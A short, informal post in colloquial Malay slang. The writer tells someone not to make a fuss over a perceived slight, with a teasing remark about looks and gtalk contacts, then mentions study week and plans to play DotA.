so pd sesape yg ter4se tu..maap mmg ko xpatut kecoh bnde tu pon...ko pon bukan cantik sgt pon,ade byk lagi org yg lagi cantik dr ko kt gtalk list ak(hak3..ayat tension!) take it easy...for both side....for GOD's SAKE!

::study week...jom smbung study,ptg ni nk dota plak...haish::